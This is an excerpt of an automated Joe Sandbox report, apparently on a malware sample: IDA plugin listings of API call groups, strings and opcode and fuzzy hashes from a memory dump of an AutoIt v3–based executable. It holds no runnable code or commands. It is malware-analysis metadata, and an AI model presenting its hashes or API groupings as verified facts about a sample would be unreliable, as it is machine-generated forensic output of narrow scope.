                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                    • String ID: AU3!$EA06$SCRIPT
                                                                                                                    • API String ID: 3051347437-2925976212
                                                                                                                    • Opcode ID: 3718b3354401d781ad32d34eacd2d54cda69a35946875b41d0d437c2bbb5cda4
                                                                                                                    • Instruction ID: a8e547601054d147a862996f88012c787503b1a9946786cfc46fe68f576b9ab0
                                                                                                                    • Opcode Fuzzy Hash: 3718b3354401d781ad32d34eacd2d54cda69a35946875b41d0d437c2bbb5cda4
                                                                                                                    • Instruction Fuzzy Hash: 9D91E372B1964185EB20EB6DD444A7CA7A8BF6BB84F814136DF5E477B9DF38E4048320

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentInfoSystemVersionWow64
                                                                                                                    • String ID: |O
                                                                                                                    • API String ID: 1568231622-607156228
                                                                                                                    • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                                                    • Instruction ID: e6d5c03e170e8892ea1ca505f5bddfb69f2db5bd7d51627d3e4c2fe2c8a1853a
                                                                                                                    • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                                                                    • Instruction Fuzzy Hash: 0CD16211E1D2868DE621AB1CA825579A791BF73798FC4003ADF8D0267DDE6CB520C7F1

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1787492119-0
                                                                                                                    • Opcode ID: d2e29d3ffbacfca874330b1c48f13b927d8d5c063079190f193b8750392c8347
                                                                                                                    • Instruction ID: 2844b0d2b2a31df63dbc5efa0015ab274303f4b98770370eef935b50b4af081b
                                                                                                                    • Opcode Fuzzy Hash: d2e29d3ffbacfca874330b1c48f13b927d8d5c063079190f193b8750392c8347
                                                                                                                    • Instruction Fuzzy Hash: E9E17C22A08B8185EB10EB6ED4501BDA3A0FF96B88F844536EF5D477B9CF38E4518790
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2695905019-0
                                                                                                                    • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                                                    • Instruction ID: 968af74d4b8189c231db13deae88c2bb47c85a4c8a949e63fb8de51943db32c0
                                                                                                                    • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                                                                    • Instruction Fuzzy Hash: 1CF05450D0870291EE246B3CA84C3B49360BF63BB5F945330DE7F062F8DFACA4695A90

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                                                                    • API String ID: 2667193904-1575078665

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                    • String ID: TaskbarCreated
                                                                                                                    • API String ID: 129472671-2362178303

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                    • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                                                                    • API String ID: 2914291525-2659433951

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                                                                    • String ID: close all
                                                                                                                    • API String ID: 1992507300-3243417748

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                    • String ID: AutoIt v3
                                                                                                                    • API String ID: 423443420-1704141276

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1617910340-0

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3249950245-0
                                                                                                                    • Opcode ID: c8d44295f0387fdbfff5ef6264fc501ae10a05964bf363e687d087dd754412c7
                                                                                                                    • Instruction ID: 1e65935b8ad11ffed3629e28bb17c4a9286eb4d72f71c09bd8675e415449a319
                                                                                                                    • Opcode Fuzzy Hash: c8d44295f0387fdbfff5ef6264fc501ae10a05964bf363e687d087dd754412c7
                                                                                                                    • Instruction Fuzzy Hash: 1F22B332A0CA8286EB64AB2CD4503B9A7A1FB66744F940136EF4D436B9CF3CF455C764

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 849 7ff7bb7e3cbc-7ff7bb7e3d88 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Create$Show
                                                                                                                    • String ID: AutoIt v3$d$edit
                                                                                                                    • API String ID: 2813641753-2600919596
                                                                                                                    • Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                                                                    • Instruction ID: 2ec264343040634dc63fbc03f11136ecc5b0c4540d5690857c69a1a975856a02
                                                                                                                    • Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                                                                    • Instruction Fuzzy Hash: 8921A132A2CB418BEB10DB28F45872DB3A0F75A798F905239DB8D06668CF7DD054CB50

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF7BB802D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7BB7E7FA5), ref: 00007FF7BB802D8E
                                                                                                                      • Part of subcall function 00007FF7BB802D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7BB7E7FA5), ref: 00007FF7BB802D9C
                                                                                                                      • Part of subcall function 00007FF7BB802D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7BB7E7FA5), ref: 00007FF7BB802DAC
                                                                                                                      • Part of subcall function 00007FF7BB802D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7BB7E7FA5), ref: 00007FF7BB802DBC
                                                                                                                      • Part of subcall function 00007FF7BB802D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7BB7E7FA5), ref: 00007FF7BB802DCA
                                                                                                                      • Part of subcall function 00007FF7BB802D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7BB7E7FA5), ref: 00007FF7BB802DD8
                                                                                                                      • Part of subcall function 00007FF7BB7FEEC8: RegisterWindowMessageW.USER32 ref: 00007FF7BB7FEF76
                                                                                                                    • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BB7E106D), ref: 00007FF7BB7E8209
                                                                                                                    • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BB7E106D), ref: 00007FF7BB7E828F
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7BB7E106D), ref: 00007FF7BB82D36A
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                    • String ID: AutoIt
                                                                                                                    • API String ID: 1986988660-2515660138
                                                                                                                    • Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                                                                    • Instruction ID: 3fdc700f8680c590c6742ef2155c42ec9fcafa023a52c1b7b5dbe945607db9ce
                                                                                                                    • Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                                                                    • Instruction Fuzzy Hash: 8FC1C661D19B4A89E640AB1CE860078B7A8FFB6350FD0123BDE5D42679DF7CA161C7E0

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                                                                    • String ID: Line:
                                                                                                                    • API String ID: 3135491444-1585850449
                                                                                                                    • Opcode ID: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                                                                    • Instruction ID: 7e949b700c518b90b847b6bd40ada9e3ea95a94e46ea2fb675e8e29e6aec46bc
                                                                                                                    • Opcode Fuzzy Hash: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                                                                    • Instruction Fuzzy Hash: F5414122A0868696E760FB6CD4402B9A365FF6A348FC45036DF4C426BDDF7CE554C7A0
                                                                                                                    APIs
                                                                                                                    • GetOpenFileNameW.COMDLG32 ref: 00007FF7BB82BAA2
                                                                                                                      • Part of subcall function 00007FF7BB7E56D4: GetFullPathNameW.KERNEL32(?,00007FF7BB7E56C1,?,00007FF7BB7E7A0C,?,?,?,00007FF7BB7E109E), ref: 00007FF7BB7E56FF
                                                                                                                      • Part of subcall function 00007FF7BB7E3EB4: GetLongPathNameW.KERNELBASE ref: 00007FF7BB7E3ED8
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                                    • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                                                                    • API String ID: 779396738-2360590182
                                                                                                                    • Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                                                                    • Instruction ID: f311339b222627e695b6f19b7aa416fa4d78327da24cac9fba8d16a93219aec7
                                                                                                                    • Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                                                                    • Instruction Fuzzy Hash: 0131D032608B8189E710EF29E8401ACB7A8FB5AB84F944136EF8C03B69CF3CD155C750
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_Timer$Killwcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3812282468-0
                                                                                                                    • Opcode ID: 2d5799521ef17968f8bb941a14b0e5868efdfa1f9d153b0a91d36d331dc2bdb2
                                                                                                                    • Instruction ID: d618f40490eae7504596b95d27ffd54618a32a678941a4c1db19001f5978374a
                                                                                                                    • Opcode Fuzzy Hash: 2d5799521ef17968f8bb941a14b0e5868efdfa1f9d153b0a91d36d331dc2bdb2
                                                                                                                    • Instruction Fuzzy Hash: 9B31A322A097818AEB219B2D90502A9A798F756BC8F984036DF4C0B76DCE3CD558C7A0
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7BB7E6F52,?,?,?,?,?,?,00007FF7BB7E782C), ref: 00007FF7BB7E6FA5
                                                                                                                    • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7BB7E6F52,?,?,?,?,?,?,00007FF7BB7E782C), ref: 00007FF7BB7E6FD3
                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF7BB7E6F52,?,?,?,?,?,?,00007FF7BB7E782C), ref: 00007FF7BB7E6FFA
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3677997916-0
                                                                                                                    • Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                                                                    • Instruction ID: b4f7828c7bc6bb2032035ccb9f05552c60deeb8a3b4f397e50059ce88b59c432
                                                                                                                    • Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                                                                    • Instruction Fuzzy Hash: 11218E33A1878187D7109F6DE44496EB3A8FB69B84B841131DB8D83B28DF39E414CB50
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1703294689-0
                                                                                                                    • Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                                                                    • Instruction ID: 542acd1c647d568f62e0f91c825db57ce1d8106f7b8686c72307db724ed72f64
                                                                                                                    • Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                                                                    • Instruction Fuzzy Hash: 26E0ED20B0830182EF047B7D9C493B563927FAA781F805038CE4A063BACD2DE42882A0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Similarity
                                                                                                                    • API ID: Init_thread_footer
                                                                                                                    • String ID: CALL
                                                                                                                    • API String ID: 1385522511-4196123274
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2632591731-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1144537725-0
                                                                                                                    APIs
                                                                                                                    • IsThemeActive.UXTHEME ref: 00007FF7BB7E3756
                                                                                                                      • Part of subcall function 00007FF7BB809334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BB809348
                                                                                                                      • Part of subcall function 00007FF7BB7E36E8: SystemParametersInfoW.USER32 ref: 00007FF7BB7E3705
                                                                                                                      • Part of subcall function 00007FF7BB7E36E8: SystemParametersInfoW.USER32 ref: 00007FF7BB7E3725
                                                                                                                      • Part of subcall function 00007FF7BB7E37B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB7E37F2
                                                                                                                      • Part of subcall function 00007FF7BB7E37B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB7E3807
                                                                                                                      • Part of subcall function 00007FF7BB7E37B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB7E388D
                                                                                                                      • Part of subcall function 00007FF7BB7E37B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7BB7E3785), ref: 00007FF7BB7E3924
                                                                                                                    • SystemParametersInfoW.USER32 ref: 00007FF7BB7E3797
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4207566314-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 485612231-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 918212764-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Init_thread_footer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1385522511-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3947729631-0
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF7BB814970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BB814999
                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF7BB82C8FE), ref: 00007FF7BB7E656F
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3938577545-0
                                                                                                                    APIs
                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7BB804C5C
                                                                                                                      • Part of subcall function 00007FF7BB805600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7BB805609
                                                                                                                      • Part of subcall function 00007FF7BB805600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF7BB80561A
                                                                                                                    Similarity
                                                                                                                    • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1680350287-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalDeleteSection
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 166494926-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3934441357-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: LongNamePath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 82841172-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1144537725-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Open_onexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3030063568-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentVersionWow64_onexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2932345936-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: _onexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 572287377-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: _onexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 572287377-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1452528299-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocHeap
                                                                                                                    • String ID:
